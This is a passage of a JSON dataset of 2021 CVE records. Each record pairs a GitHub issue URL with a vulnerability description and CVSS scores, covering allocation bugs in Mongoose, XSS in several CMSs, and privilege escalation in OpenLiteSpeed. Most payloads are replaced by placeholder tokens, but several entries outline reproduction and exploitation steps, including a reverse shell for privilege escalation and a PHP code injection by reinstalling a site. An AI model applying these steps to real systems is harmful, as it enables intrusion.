  63838. "description": "NULL pointer dereference caused by incorrect error handling of calloc in mg_http_serve_file APITAG Incorrect handling of the value returned by calloc may lead to: NULL pointer dereference and segmentation fault error in case of restrictive memory protection, near NULL pointer overwrite in case of limited memory restrictions (e.g. in embedded environments). Memory allocations are triggered during handling of each HTTP requests, so the allocation error can be caused remotely by flooding with requests until exhausting the memory. In some embedded environments near zero memory areas are used to store device configuration, so in this case such configuration can be overwritten remotely. Vulnerable code (mongoose.c NUMBERTAG struct http_data NUMBERTAG oid old_pfn_data; // Previous pfn_data NUMBERTAG FILE fp; // For static file serving NUMBERTAG oid mg_http_serve_file(struct mg_connection c, struct mg_http_message hm NUMBERTAG const char path, const char mime, const char hdrs NUMBERTAG struct http_data d = (struct http_data ) calloc NUMBERTAG sizeof( d NUMBERTAG d >fp = fp NUMBERTAG d >old_pfn_data = c >pfn_data NUMBERTAG c >pfn = static_cb NUMBERTAG c >pfn_data = d; See following recommendations for details (especially the calloc example): URLTAG The issue can be reproduced and tested using APITAG ( URLTAG Reproduction steps NUMBERTAG Install gdb NUMBERTAG Download and unpack code of APITAG ( URLTAG NUMBERTAG Remove hook files from from the APITAG directory APART from hooks_memory.c file: find APITAG name \"hooks_[acfost] [.]c\" delete NUMBERTAG Comment out the whole contents of hooks/hooks_memory.c file APART from the calloc section to disable hooks for: malloc and realloc. / / / void calloc(size_t num, size_t size); / typedef void ( calloc_func_t)(size_t num, size_t size); static void real_calloc(size_t num, size_t size) ... 
void calloc(size_t num, size_t size NUMBERTAG Continue with compilation of APITAG according to the manual ( URLTAG cd APITAG make NUMBERTAG Set ESAN to the path of APITAG directory export PATHTAG NUMBERTAG Download and unzip attached map APITAG NUMBERTAG Download, unzip and compile mongoose and example \"complete NUMBERTAG Download and unzip attached map APITAG FILETAG NUMBERTAG Run Mongoose \"complete\" example with APITAG in gdb using: gdb batch ex='run' ex='backtrace' args env APITAG ./example APITAG NUMBERTAG Open in the browser following URL (where APITAG is address of tested Mongoose instance): URLTAG APITAG memory operations can occur in a different sequence, actions NUMBERTAG and NUMBERTAG sometimes need to be executed multiple times.) You should receive similar output: process NUMBERTAG is executing new program: PATHTAG NUMBERTAG I APITAG NUMBERTAG accepting on URLTAG Program received signal SIGSEGV, Segmentation fault NUMBERTAG ef1 in mg_http_serve_file (c NUMBERTAG a8c0, hm NUMBERTAG fffffffdb NUMBERTAG path NUMBERTAG d4 APITAG mime NUMBERTAG c9 \"text/plain\", hdrs NUMBERTAG c8 \"\") at PATHTAG NUMBERTAG d >fp = fp NUMBERTAG ef1 in mg_http_serve_file (c NUMBERTAG a8c0, hm NUMBERTAG fffffffdb NUMBERTAG path NUMBERTAG d4 APITAG mime NUMBERTAG c9 \"text/plain\", hdrs NUMBERTAG c8 \"\") at PATHTAG NUMBERTAG e in cb (c NUMBERTAG a8c0, e NUMBERTAG ev_data NUMBERTAG fffffffdb NUMBERTAG fn_data NUMBERTAG fffffffe NUMBERTAG at APITAG NUMBERTAG in mg_call (c NUMBERTAG a8c0, e NUMBERTAG ev_data NUMBERTAG fffffffdb NUMBERTAG at PATHTAG NUMBERTAG f5 in http_cb (c NUMBERTAG a8c0, e NUMBERTAG ev_data NUMBERTAG fffffffe NUMBERTAG fn_data NUMBERTAG fffffffe NUMBERTAG at PATHTAG NUMBERTAG in mg_call (c NUMBERTAG a8c0, e NUMBERTAG ev_data NUMBERTAG fffffffe NUMBERTAG at PATHTAG NUMBERTAG e NUMBERTAG e in read_conn (c NUMBERTAG a8c0, fn NUMBERTAG dc3a APITAG ) at PATHTAG NUMBERTAG f NUMBERTAG a in mg_mgr_poll (mgr NUMBERTAG fffffffe NUMBERTAG ms NUMBERTAG at PATHTAG 
NUMBERTAG af3 in main () at APITAG",
  63839. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  63840. "severity": "CRITICAL",
  63841. "baseScore": 9.1,
  63842. "impactScore": 5.2,
  63843. "exploitabilityScore": 3.9
  63844. },
  63845. {
  63846. "CVE_ID": "CVE-2021-26529",
  63847. "Issue_Url_old": "https://github.com/cesanta/mongoose/issues/1203",
  63848. "Issue_Url_new": "https://github.com/cesanta/mongoose/issues/1203",
  63849. "Repo_new": "cesanta/mongoose",
  63850. "Issue_Created_At": "2021-01-23T17:58:50Z",
  63851. "description": "Out of bounds write caused by incorrect error handling of calloc in mg_tls_init APITAG Mongoose HTTPS server (compiled with APITAG support) is vulnerable to remote OOB write attack via connection request after exhausting memory pool. Incorrect handling of the value returned by calloc in mg_tls_init may lead to: out of bound write attempt and segmentation fault error in case of restrictive memory protection, near NULL pointer (at NUMBERTAG overwrite in case of limited memory restrictions (e.g. in embedded environments). Memory allocations are triggered during handling of each HTTPS requests, so the allocation error can be caused remotely by flooding with requests until exhausting the memory. In some embedded environments near zero memory areas are used to store device configuration, so in this case such configuration can be overwritten remotely. Vulnerable code (mongoose.c NUMBERTAG struct mg_tls NUMBERTAG char cafile; // CA certificate path NUMBERTAG mbedtls NUMBERTAG crt ca; // Parsed CA certificate NUMBERTAG mbedtls NUMBERTAG crt cert; // Parsed certificate NUMBERTAG mbedtls_ssl_context ssl; // SSL/TLS context NUMBERTAG mbedtls_ssl_config conf; // SSL TLS config NUMBERTAG mbedtls_pk_context pk; // Private key context NUMBERTAG int mg_tls_init(struct mg_connection c, struct mg_tls_opts opts NUMBERTAG struct mg_tls tls = (struct mg_tls ) calloc NUMBERTAG sizeof( tls)); printf(\"mg_tls_init tls = %p %ld \", tls, &(tls >ssl NUMBERTAG int rc NUMBERTAG LOG(LL_DEBUG, (\"%lu Setting TLS, CA: %s, cert: %s, key: %s\", c >id NUMBERTAG opts >ca == NULL ? \"null\" : opts >ca NUMBERTAG opts >cert == NULL ? \"null\" : opts >cert NUMBERTAG opts >certkey == NULL ? 
\"null\" : opts >certkey NUMBERTAG mbedtls_ssl_init(&tls >ssl NUMBERTAG mbedtls_ssl_config_init(&tls >conf NUMBERTAG mbedtls_ssl_conf_dbg(&tls >conf, debug_cb, c); See following recommendations for details (especially the calloc example): URLTAG The issue can be reproduced and tested using APITAG ( URLTAG Reproduction steps NUMBERTAG Install gdb NUMBERTAG Download and unpack code of APITAG ( URLTAG NUMBERTAG Perform compilation of APITAG according to the manual ( URLTAG cd APITAG make NUMBERTAG Set ESAN to the path of APITAG directory export PATHTAG NUMBERTAG Download and unzip attached map APITAG FILETAG NUMBERTAG Install APITAG library NUMBERTAG Download, unzip and compile mongoose example \"http restful server\" with define MBEDTLS_DIR set for APITAG directory and debug symbols ( g NUMBERTAG Run Mongoose \"http restful server\" example with APITAG in gdb using: gdb batch ex='run' ex='backtrace' args env APITAG ./example APITAG NUMBERTAG Open in the browser following URL (where APITAG is address of tested Mongoose instance): URLTAG You should receive similar output: process NUMBERTAG is executing new program: PATHTAG NUMBERTAG I APITAG Setting log level to NUMBERTAG I APITAG NUMBERTAG accepting on URLTAG Program received signal SIGSEGV, Segmentation fault NUMBERTAG ffff NUMBERTAG d0 in mbedtls_ssl_init () from PATHTAG NUMBERTAG ffff NUMBERTAG d0 in mbedtls_ssl_init () from PATHTAG NUMBERTAG fa9 in mg_tls_init (c NUMBERTAG c0, opts NUMBERTAG fffffffdbf0) at APITAG NUMBERTAG a in fn (c NUMBERTAG c0, e NUMBERTAG ev_data NUMBERTAG fn_data NUMBERTAG at APITAG NUMBERTAG df1 in mg_call (c NUMBERTAG c0, e NUMBERTAG ev_data NUMBERTAG at src/event.c NUMBERTAG fae4 in accept_conn (mgr NUMBERTAG fffffffdd NUMBERTAG lsn NUMBERTAG c0) at APITAG NUMBERTAG in mg_mgr_poll (mgr NUMBERTAG fffffffdd NUMBERTAG ms NUMBERTAG at APITAG NUMBERTAG de in main () at APITAG",
  63852. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  63853. "severity": "CRITICAL",
  63854. "baseScore": 9.1,
  63855. "impactScore": 5.2,
  63856. "exploitabilityScore": 3.9
  63857. },
  63858. {
  63859. "CVE_ID": "CVE-2021-26530",
  63860. "Issue_Url_old": "https://github.com/cesanta/mongoose/issues/1204",
  63861. "Issue_Url_new": "https://github.com/cesanta/mongoose/issues/1204",
  63862. "Repo_new": "cesanta/mongoose",
  63863. "Issue_Created_At": "2021-01-23T18:20:54Z",
  63864. "description": "Out of bounds write caused by incorrect error handling of calloc in mg_tls_init APITAG Mongoose HTTPS server (compiled with APITAG support) is vulnerable to remote OOB write attack via connection request after exhausting memory pool. Incorrect handling of the value returned by calloc in mg_tls_init may lead to: out of bound write attempt and segmentation fault error in case of restrictive memory protection, near NULL pointer overwrite in case of limited memory restrictions (e.g. in embedded environments). Memory allocations are triggered during handling of each HTTPS requests, so the allocation error can be caused remotely by flooding with requests until exhausting the memory. In some embedded environments near zero memory areas are used to store device configuration, so in this case such configuration can be overwritten remotely. Vulnerable code (mongoose.c NUMBERTAG struct mg_tls NUMBERTAG SSL_CTX ct NUMBERTAG SSL ssl NUMBERTAG int mg_tls_init(struct mg_connection c, struct mg_tls_opts opts NUMBERTAG struct mg_tls tls = (struct mg_tls ) calloc NUMBERTAG sizeof( tls)); printf(\"tls = %p %ld \", tls, (long)(&tls >ct NUMBERTAG const char id = \"mongoose NUMBERTAG static unsigned char s_initialised NUMBERTAG int rc NUMBERTAG if (!s_initialised NUMBERTAG APITAG NUMBERTAG s_initialised NUMBERTAG tls >ctx = c >is_client ? 
APITAG NUMBERTAG APITAG NUMBERTAG if ((tls >ssl = SSL_new(tls >ctx)) == NULL NUMBERTAG mg_error(c, \"SSL_new NUMBERTAG goto fail NUMBERTAG See following recommendations for details (especially the calloc example): URLTAG The issue can be reproduced and tested using APITAG ( URLTAG Reproduction steps NUMBERTAG Install gdb NUMBERTAG Download and unpack code of APITAG ( URLTAG NUMBERTAG Perform compilation of APITAG according to the manual ( URLTAG cd APITAG make NUMBERTAG Set ESAN to the path of APITAG directory export PATHTAG NUMBERTAG Download and unzip attached map APITAG FILETAG NUMBERTAG Install APITAG library NUMBERTAG Download, unzip and compile mongoose example \"http restful server\" with define OPENSSL_DIR set for APITAG directory and debug symbols ( g NUMBERTAG Run Mongoose \"http restful server\" example with APITAG in gdb using: gdb batch ex='run' ex='backtrace' args env APITAG ./example APITAG NUMBERTAG Open in the browser following URL (where APITAG is address of tested Mongoose instance): URLTAG You should receive similar output: process NUMBERTAG is executing new program: PATHTAG APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG NUMBERTAG I APITAG NUMBERTAG accepting on URLTAG Program received signal SIGSEGV, Segmentation fault NUMBERTAG d6a in mg_tls_init (c NUMBERTAG opts NUMBERTAG fffffffdbf0) at APITAG NUMBERTAG src/tls.c: No such file or directory NUMBERTAG d6a in mg_tls_init (c NUMBERTAG opts NUMBERTAG fffffffdbf0) at APITAG NUMBERTAG in fn (c NUMBERTAG e NUMBERTAG ev_data NUMBERTAG fn_data NUMBERTAG at APITAG NUMBERTAG d NUMBERTAG in mg_call (c NUMBERTAG e NUMBERTAG ev_data NUMBERTAG at src/event.c NUMBERTAG fa1d in accept_conn (mgr NUMBERTAG fffffffdd NUMBERTAG lsn NUMBERTAG at APITAG NUMBERTAG bd in mg_mgr_poll (mgr NUMBERTAG fffffffdd NUMBERTAG ms NUMBERTAG at APITAG NUMBERTAG bb in main () at APITAG",
  63865. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  63866. "severity": "CRITICAL",
  63867. "baseScore": 9.1,
  63868. "impactScore": 5.2,
  63869. "exploitabilityScore": 3.9
  63870. },
  63871. {
  63872. "CVE_ID": "CVE-2021-26716",
  63873. "Issue_Url_old": "https://github.com/emoncms/emoncms/issues/1652",
  63874. "Issue_Url_new": "https://github.com/emoncms/emoncms/issues/1652",
  63875. "Repo_new": "emoncms/emoncms",
  63876. "Issue_Created_At": "2021-01-27T20:28:35Z",
  63877. "description": "XSS Vulnerability. Hi, I have found an XSS vulnerability in PATHTAG via the 'node' parameter. Proof of concept exploit: URLTAG",
  63878. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  63879. "severity": "MEDIUM",
  63880. "baseScore": 6.1,
  63881. "impactScore": 2.7,
  63882. "exploitabilityScore": 2.8
  63883. },
  63884. {
  63885. "CVE_ID": "CVE-2021-26722",
  63886. "Issue_Url_old": "https://github.com/linkedin/oncall/issues/341",
  63887. "Issue_Url_new": "https://github.com/linkedin/oncall/issues/341",
  63888. "Repo_new": "linkedin/oncall",
  63889. "Issue_Created_At": "2021-02-05T11:56:10Z",
  63890. "description": "Reflected Cross Site Scripting in search bar. Hi! I've found a reflected cross site scripting vulnerability in Oncall's search bar. I've reported this issue to the APITAG Information Security Response Center back in September NUMBERTAG but Oncall still seems vulnerable to this date. Therefore I decided to report it here. Reproduction NUMBERTAG Navigate to ERRORTAG NUMBERTAG Click on the search bar where it now says ERRORTAG Result By clicking the search bar, a search will be done to the search API endpoint. Because nothing can be found a ERRORTAG message will be shown. Because this message includes the search query and lacks the proper HTML output encoding, the query is interpreted as HTML/JS and an alert containing the APITAG is shown. FILETAG Impact If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can: Steal the user's credentials by altering the working of the displayed login form. Perform any action within the application that the user can perform. View any information that the user is able to view. Modify any information that the user is able to modify. Mitigation In general, effectively preventing XSS vulnerabilities is likely to involve a combination of the following measures: Filter input on arrival. At the point where user input is received, filter as strictly as possible based on what is expected or valid input. Encode data on output. At the point where user controllable data is output in HTTP responses, encode the output to prevent it from being interpreted as active content. Depending on the output context, this might require applying combinations of HTML, URL, APITAG and CSS encoding. Content Security Policy. As a last line of defense, you could use a (default) Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur.",
  63891. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  63892. "severity": "MEDIUM",
  63893. "baseScore": 6.1,
  63894. "impactScore": 2.7,
  63895. "exploitabilityScore": 2.8
  63896. },
  63897. {
  63898. "CVE_ID": "CVE-2021-26739",
  63899. "Issue_Url_old": "https://github.com/millken/doyocms/issues/5",
  63900. "Issue_Url_new": "https://github.com/millken/doyocms/issues/5",
  63901. "Repo_new": "millken/doyocms",
  63902. "Issue_Created_At": "2021-02-01T04:26:10Z",
  63903. "description": "There is a SQL injection vulnerability in APITAG; no admin user login is required. Compared with the previous injection vulnerability, this vulnerability is more harmful because it can be triggered without logging in to the management account. The syntax of the CMS filter function is wrong, which causes the filter for arrays to not take effect. FILETAG in APITAG FILETAG payload: URLTAG FILETAG",
  63904. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  63905. "severity": "CRITICAL",
  63906. "baseScore": 9.8,
  63907. "impactScore": 5.9,
  63908. "exploitabilityScore": 3.9
  63909. },
  63910. {
  63911. "CVE_ID": "CVE-2021-26740",
  63912. "Issue_Url_old": "https://github.com/millken/doyocms/issues/4",
  63913. "Issue_Url_new": "https://github.com/millken/doyocms/issues/4",
  63914. "Repo_new": "millken/doyocms",
  63915. "Issue_Created_At": "2021-02-01T04:18:20Z",
  63916. "description": "The upload handler can be abused to upload files of any type. In FILETAG the first line receives the parameter allow, which is passed in when the APITAG object is instantiated; when the syupload object is constructed, the passed allow value is used directly as the list of allowed suffixes. FILETAG FILETAG Because the allowed-suffix list is taken from the request, an uploader only needs to add an allow parameter to upload files with any suffix. FILETAG FILETAG",
  63917. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  63918. "severity": "CRITICAL",
  63919. "baseScore": 9.8,
  63920. "impactScore": 5.9,
  63921. "exploitabilityScore": 3.9
  63922. },
  63923. {
  63924. "CVE_ID": "CVE-2021-26758",
  63925. "Issue_Url_old": "https://github.com/litespeedtech/openlitespeed/issues/217",
  63926. "Issue_Url_new": "https://github.com/litespeedtech/openlitespeed/issues/217",
  63927. "Repo_new": "litespeedtech/openlitespeed",
  63928. "Issue_Created_At": "2021-01-31T14:53:13Z",
  63929. "description": "Privilege Escalation Security Issue. Description I found a way to escalate privileges on Ubuntu NUMBERTAG via the APITAG web server, which runs with user(nobody):group(nogroup) privileges. Through this vulnerability, a system user that has admin panel credentials can add himself to the sudo group or the shadow group (to read the /etc/shadow file), so that the user can execute commands with high privileges. Proof of Concept NUMBERTAG There is a test user that is not a member of the sudo group. FILETAG NUMBERTAG The user changes the External App configuration as follows to get a reverse shell with high privileges. FILETAG FILETAG ERRORTAG NUMBERTAG The user sends a Graceful Restart request through the admin panel and gets a reverse shell with sudo group privileges. FILETAG",
  63930. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  63931. "severity": "HIGH",
  63932. "baseScore": 8.8,
  63933. "impactScore": 5.9,
  63934. "exploitabilityScore": 2.8
  63935. },
  63936. {
  63937. "CVE_ID": "CVE-2021-26776",
  63938. "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/29",
  63939. "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/29",
  63940. "Repo_new": "cskaza/cszcms",
  63941. "Issue_Created_At": "2021-02-02T01:16:34Z",
  63942. "description": "Multiple Stored XSS Cross Site Scripting on CSZ CMS NUMBERTAG Multiple Stored XSS Cross Site Scripting on CSZ CMS NUMBERTAG Login with editor account with rights to Forms Builder, XML Plugin Widgets, Statistic for link, Banner Manager, Carousel Widget, Pages Content, Language, Plugin Manager. Forms Builder Add or edit Forms Builder: Forms Name: APITAG APITAG APITAG \"> XML Plugin Widgets Add or edit Widgets: Widget Name: APITAG APITAG APITAG \"> Statistic for link Add New Link: URL: APITAG APITAG APITAG \"> Banner Manager Add New Banner : Banner Name: APITAG APITAG APITAG \"> Carousel Widget Add new Carousel: Carousel Name: APITAG APITAG APITAG \"> Pages Content Add or edit Pages Content: Pages Name: Abouts Us&lt;noframes&gt;&lt;p PATHTAG NUMBERTAG APITAG NUMBERTAG gt;&quot;&gt; Language Add new Language: Language Name: APITAG APITAG APITAG \"> Plugin Manager Add new Category( PATHTAG ): Category Name: APITAG APITAG APITAG \"> Add new Article( PATHTAG ): Article Name: APITAG APITAG APITAG \">",
  63943. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  63944. "severity": "MEDIUM",
  63945. "baseScore": 5.4,
  63946. "impactScore": 2.7,
  63947. "exploitabilityScore": 2.3
  63948. },
  63949. {
  63950. "CVE_ID": "CVE-2021-26786",
  63951. "Issue_Url_old": "https://github.com/customercentric-selling-poland/playtuber/issues/1",
  63952. "Issue_Url_new": "https://github.com/customercentric-selling-poland/playtuber/issues/1",
  63953. "Repo_new": "customercentric-selling-poland/playtuber",
  63954. "Issue_Created_At": "2021-02-02T16:33:04Z",
  63955. "description": "APITAG FILETAG APITAG with no limit, allowing execution of PHP code. Read this code in APITAG FILETAG FILETAG We can see that there is no check of whether the site has already been installed. FILETAG So we can reinstall the site with our own database to modify the administrator's password and log in. And we can also insert PHP code into FILETAG to execute PHP code. Submit a form like this: FILETAG And we can execute code in FILETAG . FILETAG FILETAG",
  63956. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  63957. "severity": "HIGH",
  63958. "baseScore": 8.8,
  63959. "impactScore": 5.9,
  63960. "exploitabilityScore": 2.8
  63961. },
  63962. {
  63963. "CVE_ID": "CVE-2021-26799",
  63964. "Issue_Url_old": "https://github.com/omeka/Omeka/issues/935",
  63965. "Issue_Url_new": "https://github.com/omeka/omeka/issues/935",
  63966. "Repo_new": "omeka/omeka",
  63967. "Issue_Created_At": "2021-02-03T18:18:22Z",
  63968. "description": "Stored XSS in the PATHTAG page. Hello Omeka Team! I was looking through your application APITAG and I discovered a stored XSS bug at PATHTAG While most of the pages filter out tags that are not in the whitelist when APITAG HTML\" is on, PATHTAG seems to allow them. My guess is that this is not the expected behavior? POC NUMBERTAG Create an item with a file attachment NUMBERTAG Edit the file NUMBERTAG Place ERRORTAG in one of the fields and toggle APITAG HTML\" to on. (An alert should pop up now, but ignore that and save changes NUMBERTAG Access the page containing the file, and an alert should pop up NUMBERTAG APITAG Switch to a different account to verify that this affects all users. Impact: client side code execution This bug shouldn't be very dangerous since it is only available to contributors, admins, and superusers. The session cookie is httponly, and the csrf tokens seem to be set properly (upon first glance). However, the XSS bug can be leveraged in many other ways, and it could increase the impact of a future vulnerability. Therefore, it's probably better to have it fixed. Please let me know if anything is unclear, or if this is not a legitimate issue. Thanks in advance!",
  63969. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  63970. "severity": "MEDIUM",
  63971. "baseScore": 6.1,
  63972. "impactScore": 2.7,
  63973. "exploitabilityScore": 2.8
  63974. },
  63975. {
  63976. "CVE_ID": "CVE-2021-26805",
  63977. "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/395",
  63978. "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/395",
  63979. "Repo_new": "justdan96/tsmuxer",
  63980. "Issue_Created_At": "2021-02-03T07:49:24Z",
  63981. "description": "heap buffer overflow tsmuxer. Hello, guys. I used afl-fuzz to test APITAG and found a crash. APITAG FILETAG ASan log ERRORTAG gdb ERRORTAG",
  63982. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  63983. "severity": "MEDIUM",
  63984. "baseScore": 5.5,
  63985. "impactScore": 3.6,
  63986. "exploitabilityScore": 1.8
  63987. },
  63988. {
  63989. "CVE_ID": "CVE-2021-26812",
  63990. "Issue_Url_old": "https://github.com/udima-university/moodle-mod_jitsi/issues/67",
  63991. "Issue_Url_new": "https://github.com/udima-university/moodle-mod_jitsi/issues/67",
  63992. "Repo_new": "udima-university/moodle-mod_jitsi",
  63993. "Issue_Created_At": "2021-01-29T12:13:02Z",
  63994. "description": "XSS in FILETAG . The parameter \"nom\" is not filtered properly causing javascript code to be injected. FILETAG FILETAG FILETAG It can be easily triggered by clicking this URL URLTAG",
  63995. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  63996. "severity": "MEDIUM",
  63997. "baseScore": 6.1,
  63998. "impactScore": 2.7,
  63999. "exploitabilityScore": 2.8
  64000. },
  64001. {
  64002. "CVE_ID": "CVE-2021-26834",
  64003. "Issue_Url_old": "https://github.com/alagrede/znote-app/issues/5",
  64004. "Issue_Url_new": "https://github.com/alagrede/znote-app/issues/5",
  64005. "Repo_new": "alagrede/znote-app",
  64006. "Issue_Created_At": "2021-02-03T14:00:34Z",
  64007. "description": "Multiple Stored XSS . APITAG Multiple XSS payloads are available for znote. It leads to attacker's javascript execution APITAG You can try with copy paste the payloads below NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG",
  64008. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  64009. "severity": "MEDIUM",
  64010. "baseScore": 5.4,
  64011. "impactScore": 2.7,
  64012. "exploitabilityScore": 2.3
  64013. },
  64014. {
  64015. "CVE_ID": "CVE-2021-26835",
  64016. "Issue_Url_old": "https://github.com/Zettlr/Zettlr/issues/1716",
  64017. "Issue_Url_new": "https://github.com/zettlr/zettlr/issues/1716",
  64018. "Repo_new": "zettlr/zettlr",
  64019. "Issue_Created_At": "2021-02-05T17:23:04Z",
  64020. "description": "Cross site scripting leads to Remote Code Execution. Description XSS leads to remote code execution Reproducing NUMBERTAG Download the crafted .md file ( URLTAG Or make the md file by yourself. FILETAG content: APITAG NUMBERTAG Open the file with Zettlr APITAG Version NUMBERTAG Once the page refreshes (or you click anywhere to trigger a refresh), the calculator pops up. APITAG Expected behaviour The XSS payload shouldn't execute. Set APITAG to false. Platform OS and version: Windows NUMBERTAG Zettlr Version NUMBERTAG Additional information",
  64021. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  64022. "severity": "MEDIUM",
  64023. "baseScore": 6.1,
  64024. "impactScore": 2.7,
  64025. "exploitabilityScore": 2.8
  64026. },
  64027. {
  64028. "CVE_ID": "CVE-2021-26843",
  64029. "Issue_Url_old": "https://github.com/blueness/sthttpd/issues/14",
  64030. "Issue_Url_new": "https://github.com/blueness/sthttpd/issues/14",
  64031. "Repo_new": "blueness/sthttpd",
  64032. "Issue_Created_At": "2021-01-26T20:14:02Z",
  64033. "description": "Potential memory corruption/crash due to overlapping strcpy arguments. When building sthttpd with ASAN ( APITAG ) I noticed a number of crashes with trivial requests such as the following: APITAG The problem is most visible on systems where strcpy is implemented using memcpy (e.g. GLIBC and APITAG ): here we end up with memcpy on overlapping memory ranges: ERRORTAG Regardless of whether the server crashes, the behaviour of strcpy with overlapping source and destination is warned against in the manpage, as the resulting behaviour is undefined. As the trace above shows, the offending call happens from URLTAG",
  64034. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  64035. "severity": "HIGH",
  64036. "baseScore": 7.5,
  64037. "impactScore": 3.6,
  64038. "exploitabilityScore": 3.9
  64039. },
  64040. {
  64041. "CVE_ID": "CVE-2021-26916",
  64042. "Issue_Url_old": "https://github.com/nopSolutions/nopCommerce/issues/5322",
  64043. "Issue_Url_new": "https://github.com/nopsolutions/nopcommerce/issues/5322",
  64044. "Repo_new": "nopsolutions/nopcommerce",
  64045. "Issue_Created_At": "2021-02-08T06:57:44Z",
  64046. "description": "XSS issue in the \"discountcode\" parameter. The vulnerability is a reflected XSS in the discountcode URL parameter. If an invalid discount code is entered, the value is reflected directly in the response without HTML encoding. This was tested on Google Chrome, Firefox and Edge with a fresh install of APITAG I have attached a screenshot of the APITAG The cause of the issue is the following line: URLTAG which uses the APITAG function without sanitising the user input. The same code exists in the NUMBERTAG release tag as well: URLTAG Let me know if you require additional information. FILETAG",
  64047. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  64048. "severity": "MEDIUM",
  64049. "baseScore": 6.1,
  64050. "impactScore": 2.7,
  64051. "exploitabilityScore": 2.8
  64052. },
  64053. {
  64054. "CVE_ID": "CVE-2021-26926",
  64055. "Issue_Url_old": "https://github.com/jasper-software/jasper/issues/264",
  64056. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/264",
  64057. "Repo_new": "jasper-software/jasper",
  64058. "Issue_Created_At": "2021-01-29T10:33:49Z",
  64059. "description": "APITAG heap buffer overflow vulnerability. Hi, there's a heap buffer overflow vulnerability in function APITAG , ( APITAG ) poc: FILETAG please compile JasPer with ASan, and run the poc with APITAG . It seems to be because APITAG is not equal to APITAG ERRORTAG",
  64060. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  64061. "severity": "HIGH",
  64062. "baseScore": 7.1,
  64063. "impactScore": 5.2,
  64064. "exploitabilityScore": 1.8
  64065. },
  64066. {
  64067. "CVE_ID": "CVE-2021-26927",
  64068. "Issue_Url_old": "https://github.com/jasper-software/jasper/issues/265",
  64069. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/265",
  64070. "Repo_new": "jasper-software/jasper",
  64071. "Issue_Created_At": "2021-01-29T10:42:37Z",
  64072. "description": "APITAG Null Pointer Access. Hi, There's a Null Pointer Access in APITAG run the poc with APITAG poc: FILETAG",
  64073. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  64074. "severity": "MEDIUM",
  64075. "baseScore": 5.5,
  64076. "impactScore": 3.6,
  64077. "exploitabilityScore": 1.8
  64078. },
  64079. {
  64080. "CVE_ID": "CVE-2021-26948",
  64081. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/410",
  64082. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/410",
  64083. "Repo_new": "michaelrsweet/htmldoc",
  64084. "Issue_Created_At": "2021-01-22T07:34:10Z",
  64085. "description": "SEGV on unknown address NUMBERTAG While fuzzing htmldoc I found a segmentation fault in the APITAG function, in APITAG testcase: (zipped so APITAG accepts it) FILETAG reproduced by running: APITAG htmldoc Version NUMBERTAG git [master NUMBERTAG f9d NUMBERTAG tested on: OS APITAG NUMBERTAG LTS kernel NUMBERTAG generic compiler: clang version NUMBERTAG ubuntu1 Target NUMBERTAG pc linux gnu OS : APITAG Catalina NUMBERTAG F NUMBERTAG APITAG Pro APITAG NUMBERTAG inch, Early NUMBERTAG compiler: Apple clang version NUMBERTAG clang APITAG The build installed from snap or the downloaded Mac dmg does not crash on this testcase. AddressSanitizer ERRORTAG gdb CODETAG The bug is located in APITAG compare_images. The arguments of compare_images are not checked, so APITAG leads to a segfault due to a null pointer.",
  64086. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  64087. "severity": "HIGH",
  64088. "baseScore": 7.8,
  64089. "impactScore": 5.9,
  64090. "exploitabilityScore": 1.8
  64091. },
  64092. {
  64093. "CVE_ID": "CVE-2021-27112",
  64094. "Issue_Url_old": "https://github.com/eddy8/LightCMS/issues/19",
  64095. "Issue_Url_new": "https://github.com/eddy8/lightcms/issues/19",
  64096. "Repo_new": "eddy8/lightcms",
  64097. "Issue_Created_At": "2021-02-06T10:47:54Z",
